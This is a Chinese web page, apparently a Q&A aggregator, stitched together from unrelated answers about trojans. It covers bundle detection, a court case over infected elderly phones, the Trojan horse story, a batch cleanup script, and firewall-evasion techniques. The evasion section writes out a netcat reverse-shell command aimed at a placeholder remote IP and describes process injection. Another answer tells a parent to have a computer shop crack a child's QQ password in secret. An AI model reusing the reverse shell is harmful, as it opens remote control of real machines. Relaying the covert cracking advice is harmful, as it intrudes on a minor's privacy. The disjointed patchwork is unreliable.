随着病毒编写技术的发展,木马程式对使用者的威胁越来越大,尤其是一些木马程式采用了极其狡猾的手段来隐蔽自己,使普通使用者很难在中毒后发觉,我教你一些清理木马病毒的相关知识吧。
一、档案捆绑检测
将木马捆绑在正常程式中,一直是木马伪装攻击的一种常用手段。下面我们就看看如何才能检测出档案中捆绑的木马。
1.MT捆绑克星
档案中只要捆绑了木马,那么其档案头特征码一定会表现出一定的规律,而MT捆绑克星正是通过分析程式的档案头特征码来判断的。程式执行后,我们只要单击“浏览”按钮,选择需要进行检测的档案,然后单击主介面上的“分析”按钮,这样程式就会自动对新增进来的档案进行分析。此时,我们只要检视分析结果中可执行的头部数,如果有两个或更多的可执行档案头部,那么说明此档案一定是被捆绑过的!
这些木马病毒是植入老人机手机的主板里面,只要购买手机之后,把电话卡插到老人机里面,木马程序就会获得手机里面的电话号码,个人信息等,而且这些木马程序还能够自动的拦截验证,把这个验证码传到植入木马的网络公司后台数据库。制作木马程序的科技公司和生产手机的公司进行合作,所以导致330万台老年机都被植入了木马病毒。制作木马病毒公司的吴某被判有期徒刑4年6个月,并处罚金60万,他通过违法所得的616万也将被追缴。其他非法犯罪的人也得到了法律的处罚。
网上没人教你的...如果真的那么容易破解密码.."电脑黑客"就没饭吃了
你可以试试把他经常上QQ的那台电脑的"硬盘"拆下来.拿去 电脑城.让人给你破解,密码.....自己很难搞的...有钱就好办事....电脑城高手多的很.
不过提醒你..如果让孩子知道你偷看过他的东西...他以后会更反叛...经常去网吧.那时候就更糟了...所以怎样都好...知道他的想法以后.只能慢慢教育他.也不能让他知道你看过....
木马,全称为:特洛伊木马(Trojan Horse)。 “特洛伊木马”这一词最早出先在希腊神话传说中。相传在3000年前,在一次希腊战争中。麦尼劳斯(人名)派兵讨伐特洛伊(王国),但久攻不下。他们想出了一个主意:首先他们假装被打败,然后留下一个木马。而木马里面却藏着最强悍的勇士!最后等时间一到,木马里的勇士全部冲出来把敌人打败了! "木马”的含义就是把预谋的功能隐藏在公开的功能里,掩饰真正的企图。 木马其实就是那些盗号者所制造的一些恶意程序。当木马植入了你的电脑后,电脑就会被监控起来。严重的,木马制作者可以像操作自己的机器一样控制您的机器,甚至可以远程监控您的所有操作。一举一动,都在别人的眼皮底下进行。
rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?) 2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了) 道高一尺,魔高一丈.: 你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截) 使用工具netcat就可以穿刺这种防火墙 : nc -e cmd.exe 远程ip 远程监听port 随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等 典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac ) 还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活) 典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制) 典型的如ntrootkit采用了自定义协议技术. 3.应用程序筛选.(只允许特定程序访问网络) 木马也不甘落后,自己不能访问网络,只好寄人篱下: 进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入 现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等. 4.协议筛选. (例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-) 使用这种技术的有pcshare(使用双向http隧道传输) 5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了: 比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去! 可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵 6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密. 但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用. 同时,综合利用以上对抗技术的木马也不鲜见了.木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵
试试AUTO病毒专杀_RavMonE killer
文件在杀毒软件列表里
或者将以下的英文复制到记事本中,另存为sxs2.bat,双击运行即可
@echo
attrib -h -r -s c:\sxs2.exe
del c:\sxs2.exe
attrib -h -s -r c:\autorun.inf
del c:\autorun.inf
如果是你不认识的人给你发的文件、你就不要去好奇了!如果是什么病毒或者脚本文件呢?
如果是你认识的人发的你问他要密码就可以了!
你好!QQ 邮箱收到邮件打开要解压密码,是这个邮件发送前压缩文件时输入了压缩密码。这个密码只能问邮件发送方。
一、性质不同
计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。
木马,来源于古希腊神话《荷马史诗》中的故事《木马屠城记》。而现在所谓的特洛伊木马正是指那些表面上是有用的软件、实际目的却是危害计算机安全并导致严重破坏的计算机程序。
二、特点不同
计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。木马是具有欺骗性的文件 ,是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
最简单有用的就是不要让别人接近你得电脑.可以将你电脑设置一个开机密码.
如果上面办不到的话,可以将你电脑的杀毒软件的防火墙有个木马查杀功能,没次上QQ时杀一次,瑞星的查杀速度还是比较快的‘我家就是用的他.
注:不是杀毒程序,是查杀木马程序.因为相比之下,查杀木马程序要快.
有一个办法:在电脑中随便找到一个文件夹,一般文件夹只有文件名没有其它的东西在上面。如果文件名后面是以.exe结尾的话,那么可能就中了木马了。如果不记得了,就再点进去(一般它都是会伪装成一个可执行程序),如果里面的文件夹或者其他的文稿都被修改成了exe格式的话,那就很可能是中木马了。(除了应用程序)还有一种:启动任务管理器。一般正常情况下,如果你没有运行任何程序的话,CPU的负载会很低,如果CPU在你没有运行任何程序的话,CPU负载还是很高的话,那么也是有可能中了木马了。希望对您有所帮助!
